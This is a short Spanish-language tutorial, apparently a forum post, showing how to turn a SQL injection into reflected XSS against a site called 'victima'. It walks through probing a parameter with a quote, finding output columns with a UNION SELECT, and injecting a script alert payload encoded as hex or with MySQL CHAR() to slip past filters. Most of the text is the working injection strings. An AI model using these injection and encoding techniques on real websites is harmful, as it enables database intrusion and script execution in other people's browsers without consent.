Para hacer una inyeccion XSS no persistente a travez de una inyeccion SQL hay que hacer lo siguiente:
Encontramos un sitio vulnerable
www.victima.com/index.php?id=1'
Luego hacemos un UNION con la cantidad de columnas (Ej: 6)
www.victima.com/index.php?id=1 UNION SELECT 1,2,3,4,5,6--
Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo
El original es
<script>alert("XSS");</script>
Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL
HEX ENCODED:
0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e
MySQL CHAR:
CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)
Espero que les haya gustado!